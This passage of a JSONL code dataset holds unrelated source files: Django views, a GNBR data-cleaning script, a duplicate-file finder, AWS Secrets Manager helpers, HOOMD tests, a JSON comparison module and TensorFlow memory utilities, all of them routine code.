variables.get(\"FILE_URL\")\nFILE_DELIMITER = variables.get(\"FILE_DELIMITER\")\nLABEL_COLUMN = variables.get(\"LABEL_COLUMN\")\n\nassert_not_none_not_empty(FILE_URL, \"FILE_URL should be defined!\")\nassert_not_none_not_empty(FILE_DELIMITER, \"FILE_DELIMITER should be defined!\")\n\ndataframe = pd.read_csv(FILE_URL, FILE_DELIMITER)\n\n# -------------------------------------------------------------\n# Transfer data to the next tasks\n#\ndataframe_id = compress_and_transfer_dataframe_in_variables(dataframe)\nprint(\"dataframe id (out): \", dataframe_id)\n\nresultMetadata.put(\"task.name\", __file__)\nresultMetadata.put(\"task.dataframe_id\", dataframe_id)\nresultMetadata.put(\"task.label_column\", LABEL_COLUMN)\n\n# -------------------------------------------------------------\n# Preview results\n#\npreview_dataframe_in_task_result(dataframe)\n\n# -------------------------------------------------------------\nprint(\"END \" + __file__)\n","sub_path":"MachineLearningScripts/resources/catalog/Load_Iris_Dataset.py","file_name":"Load_Iris_Dataset.py","file_ext":"py","file_size_in_byte":2002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"485211284","text":"\n\nfrom xai.brain.wordbase.nouns._atrium import _ATRIUM\n\n#class header\nclass _ATRIUMS(_ATRIUM, ):\n\tdef __init__(self,):\n\t\t_ATRIUM.__init__(self)\n\t\tself.name = \"ATRIUMS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"atrium\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_atriums.py","file_name":"_atriums.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"244830900","text":"def part1(data):\n    totalSquareFeet = 0\n    for eachPresent in data.splitlines():\n        l, w, h = eachPresent.split('x')\n        l, w, h = int(l), int(w), int(h)\n        slack = min(l * w, w * h, h * l)\n        l, w, h = 2 * l * w, 2 * w * h, 2 * h * l\n        totalSquareFeet += l + w + h + slack\n    return totalSquareFeet\n\n\ndef part2(data):\n    totalRibbon = 0\n    for eachPresent in data.splitlines():\n        presentRibbon = 0\n        l, w, h = eachPresent.split('x')\n        l, w, h = int(l), int(w), int(h)\n        bow = l * w * h\n        sides = [l, w, h]\n        sides.remove(max(sides))\n        for eachSide in sides:\n            presentRibbon += eachSide * 2\n        presentRibbon += bow\n        totalRibbon += presentRibbon\n    return totalRibbon\n\n\n","sub_path":"Python3.7/2015/Day02.py","file_name":"Day02.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"158243671","text":"\"\"\" Copyright 2012, 2013 UW Information Technology, University of Washington\n\n    Licensed under the Apache License, Version 2.0 (the \"License\");\n    you may not use this file except in compliance with the License.\n    You may obtain a copy of the License at\n\n    http://www.apache.org/licenses/LICENSE-2.0\n\n    Unless required by applicable law or agreed to in writing, software\n    distributed under the License is distributed on an \"AS IS\" BASIS,\n    WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n    See the License for the specific language governing permissions and\n    limitations under the License.\n\"\"\"\nfrom django.shortcuts import render_to_response\nfrom django.template import RequestContext\nfrom django.conf import settings\nfrom django.utils.translation import ugettext as _\nimport simplejson as json\nimport urllib\nfrom django.utils.datastructures import SortedDict\nfrom mobility.decorators import mobile_template\nfrom django.core.exceptions import ImproperlyConfigured\nimport re\nfrom spacescout_web.spot import SpotFavorite, SpotShare, Spot, SpotException, get_building_json\n\n@mobile_template('spacescout_web/{mobile/}app.html')\ndef HomeView(request, template=None):\n    # The preference order is cookie, config, then some static values\n    # That fallback order will also apply if the cookie campus isn't in\n    # settings.\n    campus = None\n\n    if hasattr(settings, \"SS_LOCATIONS\"):\n        m = re.match(r'^/([a-z]+)/', request.path)\n        if m and m.group(1) in settings.SS_LOCATIONS:\n            campus = m.group(1)\n\n    if campus is None:\n        cookies = request.COOKIES\n        if \"default_location\" in cookies:\n            cookie_value = cookies[\"default_location\"]\n            # The format of the cookie is this, urlencoded:\n            # lat,long,campus,zoom\n            campus = urllib.unquote(cookie_value).split(',')[2]\n\n            if campus not in settings.SS_LOCATIONS:\n                campus = None\n\n    if campus is None:\n        if hasattr(settings, 'SS_DEFAULT_LOCATION'):\n            campus = settings.SS_DEFAULT_LOCATION\n\n    spaces, template_values = get_campus_data(request, campus)\n\n    spaces = json.dumps(spaces)\n\n    # Default to zooming in on the UW Seattle campus if no default location is set\n    if hasattr(settings, 'SS_DEFAULT_LOCATION'):\n        default_location = settings.SS_DEFAULT_LOCATION\n    locations = settings.SS_LOCATIONS\n\n    if (hasattr(settings, 'SS_BUILDING_CLUSTERING_ZOOM_LEVELS') and hasattr(settings, 'SS_DISTANCE_CLUSTERING_RATIO')):\n        by_building_zooms = settings.SS_BUILDING_CLUSTERING_ZOOM_LEVELS\n        by_distance_ratio = settings.SS_DISTANCE_CLUSTERING_RATIO\n    else:\n        raise ImproperlyConfigured(\"You need to configure your clustering constants in settings.py or local_settings.py\")\n\n    log_shared_space_reference(request)\n\n    buildings = 
json.loads(get_building_json(request=request))\n\n favorites_json = SpotFavorite(None, request=request).get_json()\n\n # This could probably be a template tag, but didn't seem worth it for one-time use\n #TODO: hey, actually it's probably going to be a Handlebars helper and template\n buildingdict = SortedDict()\n for building in buildings:\n try:\n if not building[0] in buildingdict.keys(): # building[0] is the first letter of the string\n buildingdict[building[0]] = []\n\n buildingdict[building[0]].append(building)\n except:\n pass\n\n params = {\n 'username' : request.user.username if request.user and request.user.is_authenticated() else '',\n 'center_latitude': template_values['center_latitude'],\n 'center_longitude': template_values['center_longitude'],\n 'zoom_level': template_values['zoom_level'],\n 'locations': locations,\n 'default_location': default_location,\n 'by_building_zooms': by_building_zooms,\n 'by_distance_ratio': by_distance_ratio,\n 'buildingdict': buildingdict,\n 'spaces': spaces,\n 'favorites_json': favorites_json,\n }\n\n response = render_to_response(template, params, context_instance=RequestContext(request))\n response['Cache-Control'] = 'no-cache'\n return response\n\n\ndef get_campus_data(request, campus):\n # Only fetch space data if we are doing an default load; otherwise\n # the page JS will just ignore what we do here and perform its\n # own search query\n spot = Spot(None, request=request)\n\n if not request.COOKIES.get('spacescout_search_opts', None):\n spaces, location = spot.get_campus(campus)\n else:\n spaces, location = [], spot.get_location(campus)\n\n return spaces, location\n\ndef log_shared_space_reference(request):\n # log shared space references\n m = re.match(r'^/space/(\\d+)/.*/([a-f0-9]{32})$', request.path)\n if m:\n try:\n share = SpotShare(m.group(1), request=request)\n share.put_shared(m.group(2))\n except:\n # best effort, ignore response\n pass\n","sub_path":"views/home.py","file_name":"home.py","file_ext":"py","file_size_in_byte":5067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"392928049","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\nfrom template_app.views import TemplatePreviewView, TemplateListView, TemplateDetailView\n\nurlpatterns = patterns('',\n url(r'^$',\n TemplateListView.as_view(), \n name=\"template_list_view\"),\n\n url(r'^template/(?P[-\\w]+)/$',\n TemplatePreviewView.as_view(), \n name=\"template_preview_view\"),\n\n url(r'^template/info/(?P[-\\w]+)/$',\n TemplateDetailView.as_view(), \n name=\"template_detail_view\"),\n\n\n\n)\n\n","sub_path":"template_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"608347812","text":"# GNBR_clean_part_ii_files.py\n# Written: 04/26/18\n# Last updated: 04/26/18\n\"\"\"\nThis code parses and cleans the raw part-ii files of the GNBR network.\n\"\"\"\n\nimport gzip\nimport sys\nimport numpy as np\nfrom gnbr_parse_utils import *\n\n# Check input and print usage if number of arguments is invalid\nif len(sys.argv) != 3:\n\tprint(\"Error: wrong number of arguments, check usage statement below:\\n\")\n\tprint(\"USAGE: python GNBR_2_csv.py \")\n\texit()\n\n# Assign input file paths to their variables\ndepPathFile = sys.argv[1]\noutFile = sys.argv[2]\n\n# Default file header for the part-ii files\npart_ii_header = [\n \"pmid\", \"loc\", \n \"subj_name\", 
\"subj_loc\", \n \"obj_name\", \"obj_loc\",\n \"subj_name_raw\", \"obj_name_raw\", \n \"subj_id\", \"obj_id\", \n \"subj_type\", \"obj_type\", \"species\",\n \"path\", \"text\"\n ] \n\n# Open buffer to out csv file\nout_partii_CSV=open_csv(outFile)\n\n# Write header to file\nout_partii_CSV.writerow(part_ii_header)\n\n# Iterate over file lines and clean the data\nwith open(depPathFile, \"r\") as dpathIn:\n for line in dpathIn.readlines():\n info = line.strip().split(\"\\t\")\n\n # Omit entry if either entity is missing an identifier\n if info[8] == \"null\" or info[9] == \"null\":\n continue\n\n # GNBR uses \";\" to mark unresolved entities, so we exclude these from our cleaned data\n if \";\" in info[8] or \";\" in info[9]:\n continue\n\n if \"gene\" in depPathFile:\n # Prepend ncbigene prefix to genes, for data provinence \n if \"MESH:\" not in info[8]:\n info[8] = \"ncbigene:\" + info[8]\n if \"MESH:\" not in info[9]:\n info[9] = \"ncbigene:\" + info[9]\n \n # Get species used in the study\n if \"(Tax:\" in info[9]:\n temp = info[9].split(\"(\")\n info[9] = temp[0]\n species = temp[1].strip(\"Tax:\").strip(\")\")\n\n if \"(Tax:\" in info[8]:\n temp = info[8].split(\"(\")\n info[8] = temp[0]\n species = temp[1].strip(\"Tax:\").strip(\")\")\n\n else:\n species = \"9606\"\n else:\n species = \"9606\"\n # Convert dependency paths to lowercase to make them consistent with part-i files\n info[12] = info[12].lower()\n\n # Add in species as separate column\n info = info[:12] + [species] + info[12:]\n\n # Write cleaned line to file\n out_partii_CSV.writerow(info)\n\n","sub_path":"code/old_stuff/neo4j_v0_5/clean_part_ii_files.py","file_name":"clean_part_ii_files.py","file_ext":"py","file_size_in_byte":2523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"620913593","text":"import pandas as pd\n\n\ndef submitter(y_pred_test):\n \"\"\"\n saves './submissions.csv'\n \"\"\"\n df = pd.DataFrame({\"y\": y_pred_test})\n df.index += 0.0\n df.index.name = 'id'\n df.to_csv('submission.csv')\n","sub_path":"utils/submitter.py","file_name":"submitter.py","file_ext":"py","file_size_in_byte":215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"314894546","text":"from __future__ import print_function\nfrom __future__ import division\nfrom hoomd import *\nfrom hoomd import hpmc\nimport math\nimport unittest\n\ncontext.initialize()\n\nclass test_clusters_spheres (unittest.TestCase):\n def setUp(self):\n # setup the MC integration\n self.system = init.create_lattice(lattice.sc(a=1.3782337338022654),n=[5,5,5]) #target a packing fraction of 0.2\n self.mc = hpmc.integrate.sphere(seed=123)\n\n self.mc.shape_param.set('A', diameter=1.0)\n self.clusters = hpmc.update.clusters(self.mc, seed=54321, period=1)\n\n def test_set_params(self):\n self.clusters.set_params(move_ratio=0.2)\n self.clusters.set_params(flip_probability=0.8)\n\n def test_integrate(self):\n run(100)\n\n if comm.get_num_ranks() == 1:\n self.assertAlmostEqual(self.clusters.get_pivot_acceptance(),1.0)\n else:\n # in MPI, there are inactive boundaries\n self.assertTrue(self.clusters.get_pivot_acceptance() > 0)\n\n self.assertTrue(self.clusters.get_reflection_acceptance() > 0)\n\n def test_binary_spheres(self):\n self.system.particles.types.add('B')\n self.mc.shape_param.set('B',diameter=1.0)\n self.clusters.set_params(swap_types=['A','B'], swap_move_ratio=0.5, delta_mu=0)\n run(100)\n\n g = group.type(type='B',name='B')\n self.assertTrue(len(g) > 
0)\n if comm.get_num_ranks() == 1:\n self.assertAlmostEqual(self.clusters.get_swap_acceptance(),1.0)\n else:\n self.assertTrue(self.clusters.get_swap_acceptance() > 0)\n\n # set a finite chemical potential difference\n self.clusters.set_params(delta_mu=0.1)\n run(100)\n self.assertTrue(self.clusters.get_swap_acceptance()<1.0)\n\n def tearDown(self):\n del self.clusters\n del self.mc\n del self.system\n context.initialize();\n\nif __name__ == '__main__':\n unittest.main(argv = ['test.py', '-v'])\n","sub_path":"hoomd/hpmc/test-py/test_clusters.py","file_name":"test_clusters.py","file_ext":"py","file_size_in_byte":1967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"302276552","text":"# -*- coding: utf-8 -*-\n# @Time : 2018/2/26 11:14\n# @Author : zhao.chencheng\n# @Email : 907779487@qq.com\n# @File : Delect_file.py\n# @Software: PyCharm Community Edition\nimport os\nclass Del_file():\n '''清空某个目录'''\n def delect_file(self,path):\n ls = os.listdir(path)\n for i in ls:\n c_path = os.path.join(path, i)\n if os.path.isdir(c_path):\n Del_file().delect_file(c_path)\n else:\n os.remove(c_path)\nif __name__ == '__main__':\n path = r\"G:\\github\\UTT_python\\Autotest_2018\\screen_shoot\"\n Del_file().delect_file(path)","sub_path":"Autotest_2018/public_script/Delect_file.py","file_name":"Delect_file.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"436741013","text":"#!/usr/bin/env python3\nimport argparse\nimport hashlib\nimport multiprocessing \nfrom pathlib import Path\n\n\nDIGEST = {}\n\n\ndef show_result(flipped):\n \"\"\"Show the path of the files that already exist.\n\n :param flipped dict: each values are lists with duplicates files.\n \"\"\"\n print(\"...........finished.............\")\n print(\"................................\")\n\n for k, v in flipped.items():\n if len(v) > 1:\n print('Duplicate files founded :')\n for f in v:\n print(' - ',f)\n print(\"................................\")\n print(\".............done...............\")\n\n\ndef comparate_digest():\n \"\"\"Check and return duplicates files.\"\"\"\n flipped = {}\n\n for key, value in DIGEST.items():\n if value not in flipped:\n flipped[value] = [key]\n else:\n flipped[value].append(key) \n\n show_result(flipped)\n\n\ndef sha256(path):\n \"\"\"Hash the content file.\n\n :param path str: path to the file.\n \"\"\"\n # I choose sha256 to maximum avoid hash collision.\n m = hashlib.sha256()\n print('analysing :',path)\n with open(path, \"rb\") as f:\n # Read chunks of 4096 bytes sequentially to be memory efficient.\n for chunk in iter(lambda: f.read(4096), b\"\"):\n m.update(chunk)\n return m.digest()\n\n\ndef analyse_content(gen):\n \"\"\"Execute hash for each selected files.\"\"\"\n all_files = [file for file in gen]\n\n for file in all_files:\n file_obj = Path(file)\n\n if file_obj.is_file():\n pathname = file_obj.__str__()\n with multiprocessing.Pool() as pool:\n res = pool.map(sha256, (pathname,))\n DIGEST[pathname] = res[0]\n\n comparate_digest()\n\n\ndef main():\n parser = argparse.ArgumentParser(\n prog='DoIexist ?',\n formatter_class=argparse.RawDescriptionHelpFormatter,\n description=\"\"\"Check if a file already exists.\n\n examples:\n - Check actual folder and sub directories\n $ ./main.py -r\n - Check files in specific folder\n $ ./main.py --path /home/user/dir\n \"\"\")\n parser.add_argument('--path',\n help='Enter the path where you want to search',\n type=str)\n 
parser.add_argument('-r', action='store_true', help='Enable recursivity')\n    args = parser.parse_args()\n    path = args.path\n    recursive = args.r\n\n    # Check the path given by the user.\n    if path:\n        p = Path(path)\n    else:\n        p = Path('.')\n\n    # if recursive, we search across all folders from the given path.\n    if recursive:\n        gen = p.glob('**/*')\n    else:\n        gen = p.glob('*')\n\n    print('................................')\n    print('......... processing ...........')\n    print('................................')\n    print('......wait for the result.......')\n    print('................................')\n    analyse_content(gen)\n\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"348670106","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [('apis', '0005_fundget_result'), ]\n\n    operations = [\n        migrations.AddField(\n            model_name='fundget',\n            name='organization',\n            field=models.ForeignKey(null=True,\n                                    to='apis.Organization'),\n        ),\n        migrations.AlterField(\n            model_name='fundget',\n            name='project',\n            field=models.CharField(default='',\n                                   blank=True,\n                                   max_length=100),\n        ),\n        migrations.AlterField(\n            model_name='fundget',\n            name='result',\n            field=models.TextField(default='未公佈',\n                                   blank=True),\n        ),\n    ]\n","sub_path":"src/apis/migrations/0006_auto_20151102_0844.py","file_name":"0006_auto_20151102_0844.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"178913576","text":"from os import path\nfrom codecs import open\nfrom setuptools import setup, find_packages\n\n\nNAME = 'raspistream'\nVERSION = '0.1.1'\nDESCRIPTION = 'RTMP(s) streaming for RaspberryPi 3 + PiSound & PiCam'\nAUTHOR = 'MrFranipane'\nAUTHOR_EMAIL = 'contact@frangipane.me'\n\n\n_here = path.abspath(path.dirname(__file__))\n_readme_filepath = path.join(_here, 'README.md')\n_requirements_filepath = path.join(_here, 'requirements.txt')\n\n\nif path.isfile(_readme_filepath):\n    with open(_readme_filepath, encoding='utf-8') as readme_file:\n        _long_description = readme_file.read()\nelse:\n    _long_description = 'Unable to load README.md'\n\n\nif path.isfile(_requirements_filepath):\n    with open(_requirements_filepath) as requirements_file:\n        _requirements = requirements_file.readlines()\nelse:\n    _requirements = list()\n\n\nsetup(\n    name=NAME,\n    version=VERSION,\n    description=DESCRIPTION,\n    long_description=_long_description,\n    author=AUTHOR,\n    author_email=AUTHOR_EMAIL,\n    packages=find_packages(exclude=['tests']),\n    install_requires=_requirements,\n    include_package_data=True\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"460363793","text":"# uncompyle6 version 3.6.7\n# Python bytecode 3.8 (3413)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: build\\bdist.win32\\egg\\atapibasiclib\\jsoncompare.py\n# Compiled at: 2019-12-24 22:13:18\n# Size of source mod 2**32: 10627 bytes\nimport copy, json, re\nfrom collections import Counter\n\ndef json_comp(dictobj1, dictobj2={}):\n    \"\"\"\n    [Function] Check whether two dict objects stand in a containment relationship\n    [Params] dictobj1: dict\n             dictobj2: dict\n    [Result] If every key-value pair of dictobj2 also exists in dictobj1 along an identical path, a containment relationship is assumed to hold; otherwise it does not\n    \"\"\"\n    if dictobj2 == {}:\n        return True\n    else:\n        if not isinstance(dictobj1, dict):\n            dictobj1 = json.loads(dictobj1)\n        if not isinstance(dictobj2, dict):\n            dictobj2 = json.loads(dictobj2)\n        values_dictobj2 = list(all_list(getvalues(dictobj2, result=[])).keys())\n        fp_dictobj1 = find_path(dictobj1)\n        fp_dictobj2 = find_path(dictobj2)\n        result = True\n        for value in values_dictobj2:\n            the_value_path_dictobj1 = list(set(fp_dictobj1.the_value_path(value)))\n            the_value_path_dictobj2 = list(set(fp_dictobj2.the_value_path(value)))\n            the_value_path_dictobj1 = resetpathindex(the_value_path_dictobj1)\n            the_value_path_dictobj2 = resetpathindex(the_value_path_dictobj2)\n            print('the_value_path_dictobj1=%s' % the_value_path_dictobj1)\n            print('the_value_path_dictobj2=%s' % the_value_path_dictobj2)\n            if set(the_value_path_dictobj2) <= set(the_value_path_dictobj1):\n                pass\n            else:\n                result = False\n\n        return result\n\n\nclass find_path:\n\n    def __init__(self, target):\n        self.target = target\n\n    def find_the_value(self, target, value, path='', path_list=None):\n        \"\"\"Exact match: every level passed through (list, dict) extends the path; only when the last level is reached and the current target is the searched value is the corresponding path recorded\n        :param target: the object being searched\n        :param value: the keyword to search for\n        :param path: the path of the current position\n        :param path_list: list collecting all matched paths\n        Dispatch on the current target's type: ...a dict: loop over its items, record the path for each key, then recurse with the value v as the new target and the extended path\n        ...a list: loop over its elements, record the path for each position, then recurse with the element as the new target and the extended path\n        ...a str or int: check whether the current target equals the searched value; if so, append the path to the list\"\"\"\n        if isinstance(target, dict):\n            for k, v in target.items():\n                path1 = copy.deepcopy(path)\n                path1 = path1 + str([k])\n                self.find_the_value(v, value, path1, path_list)\n\n        elif isinstance(target, (list, tuple)):\n            for i in target:\n                path1 = copy.deepcopy(path)\n                posi = target.index(i)\n                path1 = path1 + '[%s]' % posi\n                self.find_the_value(i, value, path1, path_list)\n\n        elif isinstance(target, (str, int)) and str(value) == str(target):\n            path_list.append(path)\n\n    def find_in_value(self, target, value, path='', path_list=None):\n        \"\"\"Containment match: same as above, only the final comparison differs\"\"\"\n        if isinstance(target, dict):\n            for k, v in target.items():\n                path1 = copy.deepcopy(path)\n                path1 = path1 + str([k])\n                self.find_in_value(v, value, path1, path_list)\n\n        elif isinstance(target, (list, tuple)):\n            for i in target:\n                path1 = copy.deepcopy(path)\n                posi = target.index(i)\n                path1 = path1 + '[%s]' % posi\n                self.find_in_value(i, value, path1, path_list)\n\n        elif isinstance(target, (str, int)) and str(value) in str(target):\n            path_list.append(path)\n\n    def find_the_key(self, target, key, path='', path_list=None):\n        \"\"\"Key search: every level passed through (list, dict) extends the path; inside a dict, if the current k is the searched key, the corresponding path is recorded\n        :param target: the object being searched\n        :param key: the key to search for\n        :param path: the path of the current position\n        :param path_list: list collecting all matched paths\n        Dispatch on the current target's type: ...a dict: loop over its items, record the path for each key, and check whether the current k is the one searched for: ~~~if yes, append the path to the list\n        ~~~if not, recurse with the value v as the new target and the extended path\n        ...a list: loop over its elements, record the path for each position, then recurse with the element as the new target and the extended path\n        \"\"\"\n        if isinstance(target, dict):\n            for k, v in target.items():\n                path1 = copy.deepcopy(path)\n                path1 = path1 + str([k])\n                if str(key) == str(k):\n                    path_list.append(path1)\n                else:\n                    self.find_the_key(v, key, path1, path_list)\n\n        else:\n            if isinstance(target, (list, tuple)):\n                for i in target:\n                    path1 = copy.deepcopy(path)\n                    posi = target.index(i)\n                    path1 = path1 + '[%s]' % posi\n                    self.find_the_key(i, key, path1, path_list)\n\n    def in_value_path(self, value):\n        \"\"\"Containment match on value\"\"\"\n        path_list = []\n        self.find_in_value((self.target), value, path_list=path_list)\n        return path_list\n\n    def the_value_path(self, value):\n        \"\"\"Exact match on value\"\"\"\n        path_list = []\n        self.find_the_value((self.target), value, path_list=path_list)\n        return path_list\n\n    def the_key_path(self, value):\n        \"\"\"Key search only\"\"\"\n        path_list = []\n        self.find_the_key((self.target), value, path_list=path_list)\n        return path_list\n\n\ndef getvalues(dic, result):\n    \"\"\"\n    [Function] Collect the value of every key-value pair of the given dict\n    [Params] dic: the input dict\n             result: list that accumulates the value of every key-value pair in dic\n    \"\"\"\n    count = 0\n    keys = dic.keys()\n    for key in keys:\n        value = dic.get(key)\n        if isinstance(value, dict):\n            getvalues(value, result)\n        elif isinstance(value, list):\n            for ls in value:\n                if isinstance(ls, dict):\n                    getvalues(ls, result)\n                else:\n                    result.append(value)\n\n        else:\n            result.append(value)\n\n    return result\n\n\ndef all_list(arr):\n    \"\"\"\n    [Function] Count the occurrences of each distinct value in a list\n    [Params] arr: list\n    [Result] returns a dict mapping each distinct value to its count\n    \"\"\"\n    result = {}\n    for i in set(arr):\n        result[i] = arr.count(i)\n\n    return result\n\n\ndef resetpathindex(lst):\n    \"\"\"\n    [Function] Reset the array indices contained in a set of dict paths\n    [Params] lst: the list of dict paths to be reset\n    [Result] the reset dict paths. For example: [\"['result'][2]['orgCodeList'][3]\", \"['result'][2]['orgCodeList'][3]\",\"['result']['companies'][3]['orgCode']\", \"['result']['ownOrgCode']\"]\n    becomes after resetting: [\"['result'][0]['orgCodeList'][0]\", \"['result'][1]['orgCodeList'][1]\", \"['result']['companies'][0]['orgCode']\", \"['result']['ownOrgCode']\"]\n    \"\"\"\n    for i in range(len(lst)):\n        ls = re.findall('\\\\[+\\\\d+\\\\]+', str(lst[i]))\n        for j in range(len(ls)):\n            lst[i] = lst[i].replace(ls[j], '[]')\n\n    list_count = Counter(lst)\n    for key in list_count:\n        index = 0\n\n        if list_count[key] > 1:\n            for k in range(len(lst)):\n                if lst[k] == key:\n                    lst[k] = lst[k].replace('[]', '[' + str(index) + ']')\n                    index += 1\n            index = 0\n\n        else:\n            if list_count[key] == 1:\n                for k in range(len(lst)):\n                    lst[k] = lst[k].replace('[]', '[' + str(index) + ']')\n\n            index = 0\n    return lst","sub_path":"pycfiles/api_bible_sdk-0.1.1.tar/jsoncompare.cpython-38.py","file_name":"jsoncompare.cpython-38.py","file_ext":"py","file_size_in_byte":8484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"}
+{"seq_id":"328276042","text":"import boto3\n\nfrom helpers import write_secret\n\n\nREAD_ONLY_ROLE_ARN = \"arn:aws:iam::975596993436:role/storage-read_only\"\nDEV_ROLE_ARN = \"arn:aws:iam::975596993436:role/storage-developer\"\n\n\nsts_client = boto3.client(\"sts\")\n\n\ndef get_aws_resource(resource, *, role_arn=READ_ONLY_ROLE_ARN):\n    assumed_role_object = sts_client.assume_role(\n        RoleArn=role_arn, RoleSessionName=\"AssumeRoleSession1\"\n    )\n    credentials = assumed_role_object[\"Credentials\"]\n    return boto3.resource(\n        resource,\n        aws_access_key_id=credentials[\"AccessKeyId\"],\n        aws_secret_access_key=credentials[\"SecretAccessKey\"],\n        aws_session_token=credentials[\"SessionToken\"],\n    )\n\n\ndef get_aws_client(resource, *, role_arn=READ_ONLY_ROLE_ARN):\n    assumed_role_object = sts_client.assume_role(\n        RoleArn=role_arn, RoleSessionName=\"AssumeRoleSession1\"\n    )\n    credentials = assumed_role_object[\"Credentials\"]\n    return boto3.client(\n        resource,\n        aws_access_key_id=credentials[\"AccessKeyId\"],\n        aws_secret_access_key=credentials[\"SecretAccessKey\"],\n        aws_session_token=credentials[\"SessionToken\"],\n    )\n\n\ndef get_elastic_ip():\n    \"\"\"\n    Our VPCs have exactly one elastic IP associated with them.\n\n    Because our services run in private subnets and use a NAT Gateway to connect\n    to the public Internet through an elastic IP, this is the address from which\n    all our service traffic will originate.\n\n    Returns the 
IPv4 address of our elastic IP.\n \"\"\"\n ec2_client = get_aws_client(\"ec2\")\n resp = ec2_client.describe_addresses()\n\n ipv4_addresses = [addr[\"PublicIp\"] for addr in resp[\"Addresses\"]]\n\n if len(ipv4_addresses) == 0:\n raise RuntimeError(\"No Elastic IPs found!\")\n elif len(ipv4_addresses) > 1:\n address_string = \", \".join(ipv4_addresses)\n raise RuntimeError(f\"More than one Elastic IP found: {address_string}\")\n else:\n return ipv4_addresses[0]\n\n\ndef store_secret(*, secret_id, secret_string):\n \"\"\"\n Store a SecretString in Secrets Manager.\n \"\"\"\n secrets_client = get_aws_client(\"secretsmanager\", role_arn=DEV_ROLE_ARN)\n write_secret(secrets_client, id=secret_id, value=secret_string)\n","sub_path":"scripts/_aws.py","file_name":"_aws.py","file_ext":"py","file_size_in_byte":2199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"366702422","text":"import tensorflow as tf\nimport numpy as np\nimport random\ndef variable_summaries(var, scope):\n\twith tf.name_scope(scope):\n\t\tmean = tf.reduce_mean(var)\n\t\ttf.summary.scalar('mean', mean)\n\t\t#with tf.name_scope('stddev'):\n\t\t#\tstddev = tf.sqrt(tf.reduce_mean(tf.square(var - mean)))\n\t\t#tf.summary.scalar('stddev', stddev)\n\t\t#tf.summary.scalar('max', tf.reduce_max(var))\n\t\t#tf.summary.scalar('min', tf.reduce_min(var))\n\t\ttf.summary.histogram('histogram', var)\n\n\ndef weight_variable(input_dim, output_dim, trainable, scale=0.1):\n\treturn tf.get_variable(\n\t\tname='weights',\n\t\tshape=[input_dim, output_dim],\n\t\tinitializer=tf.truncated_normal_initializer(stddev=0.1),\n\t\ttrainable=trainable)\n\ndef bias_variable(output_dim, trainable):\n\treturn tf.get_variable(\n\t\tname='bias',\n\t\tshape=[1,output_dim],\n\t\tinitializer=tf.constant_initializer(0.1),\n\t\ttrainable=trainable)\n\n\nclass Memory(object):\n\tdef __init__(self):\n\t\tself.actions = None\n\t\tself.observation = None\n\t\tself.adv = None\n\t\tself.v = None\n\t\tself.target_v = None\n\t\tself.size = 0\n\tdef save(self, s, a, advs, target_v, v):\n\t\tif (self.size == 0):\n\t\t\tself.observation = s.copy()\n\t\t\tself.actions = a.copy()\n\t\t\tself.adv = advs.copy()\n\t\t\tself.target_v = target_v.copy()\n\t\t\tself.v = v.copy()\n\t\t\tself.size = self.observation.shape[0]\n\t\telse:\t\n\t\t\tself.observation = np.concatenate([self.observation, s.copy()], axis=0)\n\t\t\tself.actions = np.concatenate([self.actions, a.copy()], axis=0)\n\t\t\tself.adv = np.concatenate([self.adv, advs.copy()], axis=0)\n\t\t\tself.target_v = np.concatenate([self.target_v, target_v.copy()], axis=0)\n\t\t\tself.v = np.concatenate([self.v, v.copy()], axis=0)\n\t\t\tself.size = self.observation.shape[0]\n\n\tdef sample(self, *, batch_size):\n\t\tassert self.size >= batch_size, 'Not enough transitions'\n\t\tindices = random.sample(range(self.size), batch_size)\n\t\tbs = self.observation[indices, :].copy()\n\t\tba = self.actions[indices, :].copy()\n\t\tbadv = self.adv[indices, :].copy()\n\t\tbtarv = self.target_v[indices, :].copy()\n\t\tboldv = self.v[indices, :].copy()\n\t\treturn bs, ba, badv, btarv, boldv\n\n\tdef sample_all(self):\n\t\treturn self.observation.copy(), self.actions.copy(), self.adv.copy(), self.target_v.copy(), self.v.copy()\n\n\tdef reset(self):\n\t\tself.actions = None\n\t\tself.observation = None\n\t\tself.adv = None\n\t\tself.target_v = None\n\t\tself.v = None\n\t\tself.size = 0\n\n\tdef get_size(self):\n\t\tif 